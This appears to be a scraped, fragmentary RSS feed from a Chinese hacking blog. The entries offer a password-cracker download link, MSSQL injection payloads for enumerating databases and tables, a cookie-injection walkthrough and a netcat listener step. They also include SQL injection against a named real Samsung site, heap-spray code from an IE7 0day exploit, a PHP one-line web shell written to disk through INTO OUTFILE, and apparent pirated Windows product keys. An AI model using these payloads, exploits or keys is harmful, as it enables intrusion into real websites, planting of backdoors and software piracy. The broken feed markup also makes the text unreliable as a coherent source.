http://www.xkww.com/ zh LBS v2.0.313 Thu, 11 Mar 2010 04:40:01 +0800 60 ]]> Sat, 06 Jun 2009 18:11:36 +0800 2.0主要是优化了密码的破解线程问题。
降低了资源耗费。
优点依旧破解纯数字速度飞快！
我私人问题解决完我发布特别版哈！有打算公布源代码。。

http://www.xkww.com/20.rar 下载地址]]> ]]> Thu, 23 Apr 2009 13:04:18 +0800
爆库语句，修改红色部分的数字挨个猜出库
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

爆表语句,somedb部份是所要列的数据库，红色数字1累加
/**/and/**/(select/**/top/**/1/**/cast(name/**/as]]> ]]> Mon, 16 Feb 2009 21:47:00 +0800 ]]> Tue, 23 Dec 2008 22:05:24 +0800 具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。
cookie值是连接后才保存到本机的，也就是关IE后.
前提条件：一、网站没有过滤cookie方式的注入。
二、需事前了解数据库的管理员表段名，计算一下注入文件数据库查询语句在数据库中的列数。
打开数据库,找到Product这个表名，计算字段数为21个。管理员表名为admin 用户与密码字段名为username、password，呵呵没有注入文件，我们可以自己构造一个测试方便大家的理解。
构造如下简单注入ASP，当然我没作什么严格的过滤，也就是接受任何方式的提交。.
<!--#include ]]> ]]> Tue, 23 Dec 2008 22:05:01 +0800 　　本地NC 监听一个端口 上面语句中的IP端口改为自己监听的。。]]> ]]> Tue, 23 Dec 2008 22:04:23 +0800 http://notebook.samsung.com.cn/index.aspx
　　注入方式是：

　　一般网站的搜索都是部分匹配的

　　有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC=

　　构造注入语句 三星%’and 1=1 and ’%’=’

　　三星%’and 1=2 and ’%’=’

　　大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%’and 1=1 and ’%’=’ 返回时有的

　　我们知道一般搜索代码是这么写的：

　　Select * from 表名 where 字段 like ’%关键字%’

　　这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)
]]> ]]> Fri, 12 Dec 2008 10:58:12 +0800 这两天这个IE7的0day挺热的，我也凑凑热闹，说实话，不怎么会javascript，所以分析也挺费劲的，
但是大体知道是个怎么回事触发这个漏洞的了

0day代码片断
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://&#114;&#2570;&#114;.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');

关键触发是由于这个Image SRC的字段的数据造成的
]]> ]]> Wed, 10 Dec 2008 10:14:15 +0800
湛江那边更新了发出来了。我也发给吧。。。不分析。上代码。

360补完还是中的~

<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
function sleep(milliseconds)
{
var start=new Date().getTime();

for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}

function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
]]> ]]> Fri, 21 Nov 2008 15:19:22 +0800 Create TABLE b (cmd text NOT NULL);
Insert INTO b (cmd) VALUES('<?php @eval($_POST[cmd]);?>');
//在字段cmd中插入一句话木马，木马内容为<?php @eval($_POST[cmd]);?>
前3句都尅执行成功最后一句执行后显示空白
select cmd from b into outfile 'E:\wwwroot\phpcms\phpcms\shell.php';]]> ]]> Tue, 11 Nov 2008 10:21:57 +0800 R7MPM-R36DT-F38FC-RPPCX-XJG7M
KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
RBDC9-VTRC8-D7972-J97JY-PRVMG]]>